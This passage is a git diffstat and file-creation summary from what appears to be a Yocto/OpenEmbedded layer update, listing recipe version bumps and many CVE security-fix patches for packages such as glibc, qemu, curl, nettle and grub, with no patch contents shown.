...Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch | 56 + ...Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch | 124 + ...deadlock-between-pthread_create-and-ctors.patch | 276 + .../glibc/glibc/CVE-2021-33574_1.patch | 72 + .../glibc/glibc/CVE-2021-33574_2.patch | 73 + .../recipes-core/glibc/glibc/CVE-2021-38604.patch | 41 + poky/meta/recipes-core/glibc/glibc_2.31.bb | 11 + .../glibc/ldconfig-native-2.12.1/ldconfig.patch | 2 +- poky/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb | 2 +- .../images/build-appliance-image_15.0.0.bb | 2 +- poky/meta/recipes-core/libxcrypt/libxcrypt.inc | 2 +- poky/meta/recipes-core/libxml/libxml2_2.9.10.bb | 2 +- .../meta/recipes-core/meta/cve-update-db-native.bb | 9 +- poky/meta/recipes-core/musl/libucontext_git.bb | 2 +- poky/meta/recipes-core/musl/musl-obstack.bb | 2 +- poky/meta/recipes-core/musl/musl-utils.bb | 2 +- poky/meta/recipes-core/musl/musl_git.bb | 2 +- .../ncurses/files/CVE-2021-39537.patch | 30 + poky/meta/recipes-core/ncurses/ncurses.inc | 2 +- poky/meta/recipes-core/ncurses/ncurses_6.2.bb | 1 + poky/meta/recipes-core/os-release/os-release.bb | 4 +- poky/meta/recipes-core/psplash/psplash_git.bb | 2 +- poky/meta/recipes-core/systemd/systemd.inc | 2 +- ...ation-info-for-ordered-set-new-and-introd.patch | 78 + ...ce-ordered_set_clear-free-with-destructor.patch | 35 + .../network-add-skeleton-of-request-queue.patch | 285 + ...op-requests-when-link-enters-linger-state.patch | 50 + .../network-fix-Link-reference-counter-issue.patch | 278 + ...ge-link_drop-and-link_detach_from_manager.patch | 67 + poky/meta/recipes-core/systemd/systemd_244.5.bb | 8 + .../recipes-core/update-rc.d/update-rc.d_0.8.bb | 2 +- poky/meta/recipes-core/util-linux/util-linux.inc | 7 +- .../recipes-devtools/binutils/binutils-2.34.inc | 2 + ...es-of-system-directories-when-cross-linki.patch | 26 +- .../binutils/binutils/CVE-2020-16593.patch | 204 + .../binutils/binutils/CVE-2021-3549.patch | 187 + ....in-make-sure-only-one-bootchartd-process.patch | 68 + .../bootchart2/bootchart2_0.14.9.bb | 3 +- .../btrfs-tools/btrfs-tools_5.4.1.bb | 2 +- .../build-compare/build-compare_git.bb | 2 +- .../recipes-devtools/cmake/cmake-native_3.16.5.bb | 1 + ...ke-FindGTest-Add-target-for-gmock-library.patch | 255 + .../createrepo-c/createrepo-c_0.15.7.bb | 2 +- poky/meta/recipes-devtools/distcc/distcc_3.3.3.bb | 2 +- ...led-packages-in-upgrade-job-RhBug-1728252.patch | 60 + poky/meta/recipes-devtools/dnf/dnf_4.2.2.bb | 3 +- poky/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc | 2 +- ...k-don-t-try-to-rehash-a-deleted-directory.patch | 49 - ...c-create_inode.c-set-dir-s-mode-correctly.patch | 41 - .../e2fsprogs/e2fsprogs/CVE-2019-5188.patch | 57 - ...fsck-fix-use-after-free-in-calculate_tree.patch | 76 - ...s-fix-missing-check-for-permission-denied.patch | 2 +- .../e2fsprogs/e2fsprogs/quiet-debugfs.patch | 2 +- .../recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb | 147 - .../recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb | 143 + poky/meta/recipes-devtools/file/file_5.38.bb | 2 +- poky/meta/recipes-devtools/flex/flex_2.6.4.bb | 5 + poky/meta/recipes-devtools/gcc/gcc-9.3.inc | 4 + ...40-fix-missing-dependencies-for-selftests.patch | 45 + .../git/files/CVE-2021-40330.patch | 108 + poky/meta/recipes-devtools/git/git.inc | 4 +- poky/meta/recipes-devtools/git/git/fixsort.patch | 36 + poky/meta/recipes-devtools/glide/glide_0.13.3.bb | 2 +- .../recipes-devtools/gnu-config/gnu-config_git.bb | 2 +- poky/meta/recipes-devtools/go/go-1.14.inc | 9 + .../go/go-1.14/CVE-2021-33196.patch | 124 + .../go/go-1.14/CVE-2021-33197.patch | 152 + .../go/go-1.14/CVE-2021-34558.patch | 51 + poky/meta/recipes-devtools/go/go-dep_0.5.4.bb | 2 +- .../recipes-devtools/libcomps/libcomps_0.1.15.bb | 2 +- ...Mark-job-goal.upgrade-with-sltr-as-target.patch | 58 + poky/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb | 3 +- .../recipes-devtools/librepo/librepo_1.11.2.bb | 2 +- .../recipes-devtools/libtool/libtool-2.4.6.inc | 2 + .../libtool/libtool/lto-prefix.patch | 22 + .../meta/recipes-devtools/libtool/libtool_2.4.6.bb | 2 +- poky/meta/recipes-devtools/llvm/llvm_git.bb | 2 +- poky/meta/recipes-devtools/m4/m4-1.4.18.inc | 1 + .../m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch | 84 + ...-deprecated-exception-specification-cpp17.patch | 431 + .../mklibs/mklibs-native_0.1.44.bb | 1 + ...1-mtd-utils-Fix-return-value-of-ubiformat.patch | 62 - poky/meta/recipes-devtools/mtd/mtd-utils_git.bb | 11 +- poky/meta/recipes-devtools/ninja/ninja_1.10.0.bb | 2 +- .../recipes-devtools/patchelf/patchelf_0.10.bb | 2 +- .../recipes-devtools/pseudo/files/build-oldlibc | 20 + .../pseudo/files/older-glibc-symbols.patch | 57 + poky/meta/recipes-devtools/pseudo/pseudo_git.bb | 9 +- .../python/python3-magic_0.4.15.bb | 7 +- .../recipes-devtools/python/python3/makerace.patch | 23 + .../meta/recipes-devtools/python/python3_3.8.11.bb | 362 - .../meta/recipes-devtools/python/python3_3.8.12.bb | 363 + poky/meta/recipes-devtools/qemu/qemu.inc | 77 +- .../qemu/qemu/CVE-2020-12829_1.patch | 164 + .../qemu/qemu/CVE-2020-12829_2.patch | 139 + .../qemu/qemu/CVE-2020-12829_3.patch | 47 + .../qemu/qemu/CVE-2020-12829_4.patch | 100 + .../qemu/qemu/CVE-2020-12829_5.patch | 266 + .../qemu/qemu/CVE-2020-25085.patch | 46 + .../qemu/qemu/CVE-2020-25624_1.patch | 87 + .../qemu/qemu/CVE-2020-25624_2.patch | 101 + .../qemu/qemu/CVE-2020-25625.patch | 42 + .../qemu/qemu/CVE-2020-27617.patch | 49 + .../qemu/qemu/CVE-2020-28916.patch | 48 + .../qemu/qemu/CVE-2020-29443.patch | 45 + .../qemu/qemu/CVE-2021-20181.patch | 81 + .../qemu/qemu/CVE-2021-20221.patch | 67 + .../qemu/qemu/CVE-2021-20257.patch | 55 + .../qemu/qemu/CVE-2021-3416_1.patch | 177 + .../qemu/qemu/CVE-2021-3416_10.patch | 41 + .../qemu/qemu/CVE-2021-3416_2.patch | 42 + .../qemu/qemu/CVE-2021-3416_3.patch | 43 + .../qemu/qemu/CVE-2021-3416_5.patch | 42 + .../qemu/qemu/CVE-2021-3416_6.patch | 40 + .../qemu/qemu/CVE-2021-3416_7.patch | 42 + .../qemu/qemu/CVE-2021-3416_8.patch | 44 + .../qemu/qemu/CVE-2021-3416_9.patch | 41 + .../qemu/qemu/CVE-2021-3527-1.patch | 42 + .../qemu/qemu/CVE-2021-3527-2.patch | 59 + .../recipes-devtools/qemu/qemu/CVE-2021-3544.patch | 29 + .../qemu/qemu/CVE-2021-3544_2.patch | 39 + .../qemu/qemu/CVE-2021-3544_3.patch | 39 + .../qemu/qemu/CVE-2021-3544_4.patch | 46 + .../qemu/qemu/CVE-2021-3544_5.patch | 47 + .../recipes-devtools/qemu/qemu/CVE-2021-3545.patch | 41 + .../recipes-devtools/qemu/qemu/CVE-2021-3546.patch | 47 + .../recipes-devtools/qemu/qemu/CVE-2021-3582.patch | 47 + .../recipes-devtools/qemu/qemu/CVE-2021-3607.patch | 43 + .../recipes-devtools/qemu/qemu/CVE-2021-3608.patch | 40 + .../recipes-devtools/qemu/qemu/CVE-2021-3682.patch | 41 + ...-restrict-virtual-memory-usage-if-limit-s.patch | 25 +- .../rpm/files/CVE-2021-20266.patch | 109 + poky/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb | 6 +- .../squashfs-tools/files/CVE-2021-40153.patch | 253 + .../squashfs-tools/squashfs-tools_git.bb | 3 +- .../systemd-bootchart/systemd-bootchart_233.bb | 2 +- .../recipes-devtools/tcf-agent/tcf-agent_git.bb | 2 +- poky/meta/recipes-devtools/unfs3/unfs3_git.bb | 2 +- .../valgrind/valgrind/remove-for-aarch64 | 1 + .../valgrind/valgrind/remove-for-all | 1 + .../asciidoc/asciidoc/detect-python-version.patch | 42 + .../recipes-extended/asciidoc/asciidoc_8.6.9.bb | 3 +- poky/meta/recipes-extended/bash/bash.inc | 5 + poky/meta/recipes-extended/bzip2/bzip2/Makefile.am | 2 +- .../cpio/cpio-2.13/CVE-2021-38185.patch | 581 + poky/meta/recipes-extended/cpio/cpio_2.13.bb | 1 + poky/meta/recipes-extended/cups/cups.inc | 2 +- .../go-examples/go-helloworld_0.1.bb | 2 +- ...-arping-make-update-neighbours-work-again.patch | 79 + .../recipes-extended/iputils/iputils_s20190709.bb | 3 +- .../meta/recipes-extended/libaio/libaio_0.3.111.bb | 2 +- poky/meta/recipes-extended/libnsl/libnsl2_git.bb | 2 +- .../meta/recipes-extended/libnss-nis/libnss-nis.bb | 2 +- .../libsolv/files/CVE-2021-3200.patch | 9 +- .../recipes-extended/libsolv/libsolv_0.7.10.bb | 2 +- ...fig-for-pcre-dependency-instead-of-config.patch | 10 +- ...large-mem-chunks-fix-mem-usage-fixes-3033.patch | 224 + .../lighttpd/lighttpd/default-chunk-size-8k.patch | 35 + .../recipes-extended/lighttpd/lighttpd_1.4.55.bb | 2 + poky/meta/recipes-extended/ltp/ltp_20200120.bb | 2 +- poky/meta/recipes-extended/newt/libnewt_0.52.21.bb | 2 +- poky/meta/recipes-extended/procps/procps_3.3.16.bb | 2 +- poky/meta/recipes-extended/psmisc/psmisc_23.3.bb | 2 +- .../recipes-extended/rpcsvc-proto/rpcsvc-proto.bb | 2 +- ...-not-write-the-timestamp-into-compressed-.patch | 26 + .../stress-ng/stress-ng_0.11.17.bb | 7 +- poky/meta/recipes-extended/sysklogd/sysklogd.inc | 2 +- poky/meta/recipes-extended/tar/tar_1.32.bb | 5 +- poky/meta/recipes-extended/timezone/timezone.inc | 7 +- .../1f199813e0eb0246f63b54e9e154970e609575af.patch | 58 + .../recipes-extended/xdg-utils/xdg-utils_1.1.3.bb | 1 + poky/meta/recipes-extended/xinetd/xinetd_2.3.15.bb | 2 +- .../gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch | 40 + .../recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb | 1 + .../gobject-introspection_1.62.0.bb | 2 +- .../recipes-graphics/glew/glew/notempdir.patch | 19 + poky/meta/recipes-graphics/glew/glew_2.2.0.bb | 1 + .../recipes-graphics/libfakekey/libfakekey_git.bb | 2 +- .../libmatchbox/libmatchbox_1.12.bb | 2 +- .../recipes-graphics/libva/libva-utils_2.6.0.bb | 2 +- .../matchbox-wm/matchbox-wm_1.2.2.bb | 2 +- poky/meta/recipes-graphics/mesa/mesa.inc | 2 +- poky/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb | 2 +- ...-a-missing-include-for-htobe32-definition.patch | 27 + ...k-profile.py-make-test-lists-reproducible.patch | 31 + ...ests-gen_tcs-tes_input_tests.py-do-not-ha.patch | 44 + ...serializer.py-make-.gz-files-reproducible.patch | 30 + ...r.py-sort-the-file-list-before-working-on.patch | 28 + ...piglit-shader.c-do-not-hardcode-build-pat.patch | 30 + poky/meta/recipes-graphics/piglit/piglit_git.bb | 12 +- .../virglrenderer/virglrenderer_0.8.2.bb | 2 +- poky/meta/recipes-graphics/vulkan/assimp_5.0.1.bb | 2 +- .../recipes-graphics/vulkan/vulkan-demos_git.bb | 6 +- .../vulkan/vulkan-headers_1.1.126.0.bb | 2 +- .../vulkan/vulkan-loader_1.1.126.0.bb | 2 +- .../vulkan/vulkan-tools_1.1.126.0.bb | 2 +- poky/meta/recipes-graphics/waffle/waffle_1.6.0.bb | 12 +- ...ll-Remove-no-op-de-activation-of-the-xdg-.patch | 32 + ...ll-Rename-gain-lose-keyboard-focus-to-act.patch | 57 + ...ll-Embed-keyboard-focus-handle-code-when-.patch | 99 + poky/meta/recipes-graphics/wayland/weston_8.0.0.bb | 3 + .../xinput-calibrator/xinput-calibrator_git.bb | 2 +- .../xorg-driver/xf86-video-intel_git.bb | 2 +- .../recipes-graphics/xorg-xserver/xserver-xorg.inc | 10 +- .../xorg-xserver/xserver-xorg/CVE-2020-14360.patch | 132 + .../xorg-xserver/xserver-xorg/CVE-2020-25712.patch | 102 + .../xorg-xserver/xserver-xorg_1.20.8.bb | 2 + poky/meta/recipes-kernel/blktrace/blktrace_git.bb | 2 +- poky/meta/recipes-kernel/cryptodev/cryptodev.inc | 2 +- poky/meta/recipes-kernel/dtc/dtc.inc | 2 +- .../dtc/python3-dtschema-wrapper/dt-doc-validate | 20 + .../dtc/python3-dtschema-wrapper/dt-mk-schema | 20 + .../dtc/python3-dtschema-wrapper/dt-validate | 20 + .../dtc/python3-dtschema-wrapper_2021.10.bb | 17 + .../kern-tools/kern-tools-native_git.bb | 2 +- poky/meta/recipes-kernel/kmod/kmod.inc | 2 +- .../linux-firmware/linux-firmware_20210511.bb | 1067 - .../linux-firmware/linux-firmware_20211216.bb | 1067 + .../recipes-kernel/linux/linux-yocto-rt_5.4.bb | 6 +- .../recipes-kernel/linux/linux-yocto-tiny_5.4.bb | 8 +- poky/meta/recipes-kernel/linux/linux-yocto_5.4.bb | 22 +- .../recipes-kernel/lttng/lttng-modules_2.11.6.bb | 4 +- .../recipes-kernel/lttng/lttng-tools_2.11.5.bb | 2 +- .../make-mod-scripts/make-mod-scripts_1.0.bb | 2 +- poky/meta/recipes-kernel/powertop/powertop_2.10.bb | 2 +- .../recipes-kernel/systemtap/systemtap_git.inc | 2 +- .../wireless-regdb/wireless-regdb_2021.04.21.bb | 43 - .../wireless-regdb/wireless-regdb_2021.08.28.bb | 43 + .../ffmpeg/ffmpeg/CVE-2021-3566.patch | 61 + .../ffmpeg/ffmpeg/CVE-2021-38291.patch | 53 + .../meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb | 4 +- .../gstreamer/gst-examples_1.16.0.bb | 2 +- ...Don-t-use-too-strict-timeout-for-validati.patch | 33 + .../gstreamer/gstreamer1.0_1.16.3.bb | 1 + .../libsamplerate0/shared_version_info.patch | 13 + .../libsamplerate/libsamplerate0_0.1.9.bb | 1 + .../libsndfile/libsndfile1/CVE-2021-3246_1.patch | 36 + .../libsndfile/libsndfile1/CVE-2021-3246_2.patch | 44 + .../libsndfile/libsndfile1_1.0.28.bb | 2 + .../speex/speex/CVE-2020-23903.patch | 30 + poky/meta/recipes-multimedia/speex/speex_1.2.0.bb | 4 +- poky/meta/recipes-multimedia/x264/x264_git.bb | 2 +- poky/meta/recipes-rt/rt-tests/rt-tests.inc | 2 +- poky/meta/recipes-sato/images/core-image-sato.bb | 1 + poky/meta/recipes-sato/l3afpad/l3afpad_git.bb | 2 +- .../matchbox-config-gtk/matchbox-config-gtk_0.2.bb | 2 +- .../matchbox-desktop/matchbox-desktop_2.2.bb | 2 +- .../matchbox-panel-2/matchbox-panel-2_2.11.bb | 2 +- .../matchbox-terminal/matchbox-terminal_0.2.bb | 2 +- .../matchbox-theme-sato/matchbox-theme-sato_0.2.bb | 2 +- poky/meta/recipes-sato/puzzles/puzzles_git.bb | 2 +- .../sato-screenshot/sato-screenshot_0.3.bb | 2 +- .../settings-daemon/settings-daemon_0.0.2.bb | 2 +- .../0001-MiniBrowser-Fix-reproduciblity.patch | 31 + poky/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb | 1 + .../recipes-support/apr/apr/CVE-2021-35940.patch | 58 + poky/meta/recipes-support/apr/apr_1.7.0.bb | 1 + .../recipes-support/bmap-tools/bmap-tools_3.5.bb | 2 +- ...lla-certdata2pem.py-print-a-warning-for-e.patch | 80 + .../ca-certificates/ca-certificates/sbindir.patch | 26 - .../update-ca-certificates-support-Toybox.patch | 33 - .../ca-certificates/ca-certificates_20210119.bb | 90 - .../ca-certificates/ca-certificates_20211016.bb | 89 + .../curl/curl/CVE-2021-22946-pre1.patch | 86 + .../recipes-support/curl/curl/CVE-2021-22946.patch | 328 + .../recipes-support/curl/curl/CVE-2021-22947.patch | 352 + poky/meta/recipes-support/curl/curl_7.69.1.bb | 10 +- .../recipes-support/dos2unix/dos2unix_7.4.1.bb | 2 +- .../recipes-support/gmp/gmp/cve-2021-43618.patch | 27 + poky/meta/recipes-support/gmp/gmp_6.2.0.bb | 1 + .../gnome-desktop-testing_2018.1.bb | 2 +- ...c-use-a-custom-value-for-the-location-of-.patch | 6 +- .../gnupg/0003-dirmngr-uses-libgpg-error.patch | 24 +- .../recipes-support/gnupg/gnupg/relocate.patch | 20 +- poky/meta/recipes-support/gnupg/gnupg_2.2.20.bb | 86 - poky/meta/recipes-support/gnupg/gnupg_2.2.27.bb | 86 + ...001-use-closefrom-on-linux-and-glibc-2.34.patch | 24 + poky/meta/recipes-support/gpgme/gpgme_1.13.1.bb | 3 +- .../libgcrypt/files/CVE-2021-33560.patch | 77 + .../libgcrypt/files/CVE-2021-40528.patch | 109 + .../recipes-support/libgcrypt/libgcrypt_1.8.5.bb | 2 + .../libjitterentropy/libjitterentropy_2.2.0.bb | 2 +- .../meta/recipes-support/libpcre/libpcre2_10.34.bb | 2 +- poky/meta/recipes-support/libpcre/libpcre_8.44.bb | 2 +- poky/meta/recipes-support/libpsl/libpsl_0.21.0.bb | 7 +- .../recipes-support/libsoup/libsoup-2.4_2.68.4.bb | 2 +- .../libunistring/libunistring_0.9.10.bb | 1 + .../0001-Fix-compilation-with-fno-common.patch | 420 + .../recipes-support/libunwind/libunwind_1.3.1.bb | 1 + .../recipes-support/lz4/files/CVE-2021-3520.patch | 27 + poky/meta/recipes-support/lz4/lz4_1.9.2.bb | 3 +- poky/meta/recipes-support/lzo/lzo_2.10.bb | 2 + .../nettle/nettle-3.5.1/CVE-2021-20305-1.patch | 215 + .../nettle/nettle-3.5.1/CVE-2021-20305-2.patch | 53 + .../nettle/nettle-3.5.1/CVE-2021-20305-3.patch | 122 + .../nettle/nettle-3.5.1/CVE-2021-20305-4.patch | 48 + .../nettle/nettle-3.5.1/CVE-2021-20305-5.patch | 53 + .../nettle/nettle-3.5.1/CVE-2021-3580_1.patch | 277 + .../nettle/nettle-3.5.1/CVE-2021-3580_2.patch | 163 + poky/meta/recipes-support/nettle/nettle_3.5.1.bb | 7 + .../recipes-support/p11-kit/p11-kit_0.23.22.bb | 2 +- .../ptest-runner/ptest-runner_2.4.0.bb | 2 +- .../rng-tools/rng-tools/rngd.service | 1 + .../recipes-support/rng-tools/rng-tools_6.9.bb | 2 +- .../shared-mime-info/shared-mime-info_git.bb | 2 +- ...2.3581-reading-character-past-end-of-line.patch | 62 + ....2.3428-using-freed-memory-when-replacing.patch | 83 + ...582-reading-uninitialized-memory-when-giv.patch | 63 + ...611-crash-when-using-CTRL-W-f-without-fin.patch | 92 + ...487-illegal-memory-access-if-buffer-name-.patch | 86 + ...3489-ml_get-error-after-search-with-range.patch | 72 + ...564-invalid-memory-access-when-scrolling-.patch | 97 + .../recipes-support/vim/files/CVE-2021-3778.patch | 61 + .../recipes-support/vim/files/CVE-2021-4069.patch | 43 + .../b7081e135a16091c93f6f5f7525a5c58fb7ca9f9.patch | 207 + poky/meta/recipes-support/vim/vim.inc | 22 +- poky/scripts/buildhistory-diff | 5 - poky/scripts/contrib/convert-srcuri.py | 77 + poky/scripts/lib/checklayer/cases/common.py | 2 +- poky/scripts/lib/recipetool/create.py | 12 +- poky/scripts/lib/scriptutils.py | 10 +- poky/scripts/lib/wic/engine.py | 6 +- poky/scripts/lib/wic/help.py | 4 +- poky/scripts/lib/wic/misc.py | 16 +- poky/scripts/lib/wic/partition.py | 2 +- poky/scripts/lib/wic/pluginbase.py | 8 +- poky/scripts/lib/wic/plugins/imager/direct.py | 2 +- .../lib/wic/plugins/source/bootimg-pcbios.py | 6 +- poky/scripts/oe-pkgdata-browser | 2 + poky/scripts/pybootchartgui/pybootchartgui/draw.py | 5 +- poky/scripts/runqemu | 3 +- poky/scripts/wic | 4 +- 994 files changed, 45560 insertions(+), 4848 deletions(-) create mode 100644 meta-openembedded/meta-networking/recipes-daemons/postfix/files/0001-fix-build-with-glibc-2.34.patch delete mode 100644 meta-openembedded/meta-networking/recipes-daemons/postfix/postfix_3.4.12.bb create mode 100644 meta-openembedded/meta-networking/recipes-daemons/postfix/postfix_3.4.23.bb create mode 100644 meta-openembedded/meta-networking/recipes-support/dnsmasq/dnsmasq/CVE-2021-3448.patch create mode 100644 meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0001-auth-mech-rpa-Fail-on-zero-len-buffer.patch create mode 100644 meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0001-lib-mail-message-parser-Add-a-message_part_finish-he.patch create mode 100644 meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0002-lib-mail-message-parser-Change-message_part_append-t.patch create mode 100644 meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0002-lib-ntlm-Check-buffer-length-on-responses.patch create mode 100644 meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0003-lib-mail-message-parser-Optimize-updating-children_c.patch create mode 100644 meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0004-lib-mail-message-parser-Optimize-appending-new-part-.patch create mode 100644 meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0005-lib-mail-message-parser-Minor-code-cleanup-to-findin.patch create mode 100644 meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0006-lib-mail-message-parser-Truncate-excessively-long-MI.patch create mode 100644 meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0007-lib-mail-message-parser-Optimize-boundary-lookups-wh.patch create mode 100644 meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0008-lib-mail-message-parser-Add-boundary_remove_until-he.patch create mode 100644 meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0009-lib-mail-message-parser-Don-t-use-memory-pool-for-pa.patch create mode 100644 meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0010-lib-mail-message-parser-Support-limiting-max-number-.patch create mode 100644 meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0011-lib-mail-message-parser-Support-limiting-max-number-.patch create mode 100644 meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0012-lib-mail-Fix-handling-trailing-in-MIME-boundaries.patch create mode 100644 meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0013-lib-mail-Fix-parse_too_many_nested_mime_parts.patch create mode 100644 meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/buffer_free_fix.patch delete mode 100644 meta-openembedded/meta-networking/recipes-support/stunnel/stunnel_5.56.bb create mode 100644 meta-openembedded/meta-networking/recipes-support/stunnel/stunnel_5.57.bb create mode 100644 meta-openembedded/meta-oe/recipes-connectivity/krb5/krb5/CVE-2021-36222.patch create mode 100644 meta-openembedded/meta-oe/recipes-core/sdbus-c++/sdbus-c++-0.8.1/0001-Try-to-first-find-googletest-in-the-system-before-do.patch delete mode 100644 meta-openembedded/meta-oe/recipes-dbs/postgresql/postgresql_12.7.bb create mode 100644 meta-openembedded/meta-oe/recipes-dbs/postgresql/postgresql_12.9.bb create mode 100644 meta-openembedded/meta-oe/recipes-extended/brotli/brotli/0001-brotli-fix-CVE-2020-8927.patch delete mode 100644 meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/204.patch delete mode 100644 meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/275.patch create mode 100644 meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/317.patch delete mode 100644 meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon_2.18.4.bb create mode 100644 meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon_2.18.7.bb create mode 100644 meta-openembedded/meta-oe/recipes-extended/redis/redis_5.0.14.bb delete mode 100644 meta-openembedded/meta-oe/recipes-extended/redis/redis_5.0.9.bb create mode 100644 meta-openembedded/meta-oe/recipes-graphics/xorg-app/xterm/CVE-2021-27135.patch create mode 100644 meta-openembedded/meta-oe/recipes-support/c-ares/c-ares/ares_expand_name-fix-formatting-and-handling-of-root.patch create mode 100644 meta-openembedded/meta-oe/recipes-support/c-ares/c-ares/ares_expand_name-should-escape-more-characters.patch delete mode 100644 meta-openembedded/meta-oe/recipes-support/c-ares/c-ares_1.16.0.bb create mode 100644 meta-openembedded/meta-oe/recipes-support/c-ares/c-ares_1.16.1.bb create mode 100644 meta-openembedded/meta-oe/recipes-support/libmicrohttpd/libmicrohttpd/CVE-2021-3466.patch create mode 100644 meta-openembedded/meta-oe/recipes-support/nss/nss/CVE-2020-12403_1.patch create mode 100644 meta-openembedded/meta-oe/recipes-support/nss/nss/CVE-2020-12403_2.patch create mode 100644 meta-openembedded/meta-oe/recipes-support/nss/nss/CVE-2020-6829_12400.patch create mode 100644 meta-openembedded/meta-oe/recipes-support/nss/nss/CVE-2021-43527.patch delete mode 100644 meta-openembedded/meta-python/recipes-devtools/python/python3-fasteners_0.15.bb create mode 100644 meta-openembedded/meta-python/recipes-devtools/python/python3-fasteners_0.16.3.bb delete mode 100644 meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2020-13950.patch delete mode 100644 meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2020-35452.patch delete mode 100644 meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2021-26690.patch delete mode 100644 meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2021-26691.patch delete mode 100644 meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2021-30641.patch delete mode 100644 meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.46.bb create mode 100644 meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.51.bb delete mode 100644 meta-security/recipes-kernel/linux/linux-%_5.%.bbappend delete mode 100644 poky/bitbake/lib/bb/compat.py create mode 100644 poky/meta/files/common-licenses/Unlicense create mode 100644 poky/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt create mode 100644 poky/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt create mode 100644 poky/meta/recipes-bsp/grub/files/CVE-2020-14372.patch create mode 100644 poky/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch create mode 100644 poky/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch create mode 100644 poky/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch create mode 100644 poky/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch create mode 100644 poky/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch create mode 100644 poky/meta/recipes-bsp/grub/files/CVE-2020-27779.patch create mode 100644 poky/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch create mode 100644 poky/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch create mode 100644 poky/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch create mode 100644 poky/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch create mode 100644 poky/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch create mode 100644 poky/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch create mode 100644 poky/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch create mode 100644 poky/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch delete mode 100644 poky/meta/recipes-connectivity/bind/bind_9.11.32.bb create mode 100644 poky/meta/recipes-connectivity/bind/bind_9.11.35.bb create mode 100644 poky/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch create mode 100644 poky/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch create mode 100644 poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch create mode 100644 poky/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch create mode 100644 poky/meta/recipes-connectivity/openssl/openssl/reproducibility.patch delete mode 100644 poky/meta/recipes-connectivity/openssl/openssl_1.1.1k.bb create mode 100644 poky/meta/recipes-connectivity/openssl/openssl_1.1.1l.bb create mode 100644 poky/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch create mode 100644 poky/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch create mode 100644 poky/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch delete mode 100644 poky/meta/recipes-core/dbus/dbus-test_1.12.16.bb create mode 100644 poky/meta/recipes-core/dbus/dbus-test_1.12.20.bb create mode 100644 poky/meta/recipes-core/dbus/dbus.inc delete mode 100644 poky/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch delete mode 100644 poky/meta/recipes-core/dbus/dbus_1.12.16.bb create mode 100644 poky/meta/recipes-core/dbus/dbus_1.12.20.bb create mode 100644 poky/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch create mode 100644 poky/meta/recipes-core/expat/expat/CVE-2021-45960.patch create mode 100644 poky/meta/recipes-core/expat/expat/CVE-2021-46143.patch create mode 100644 poky/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch create mode 100644 poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch create mode 100644 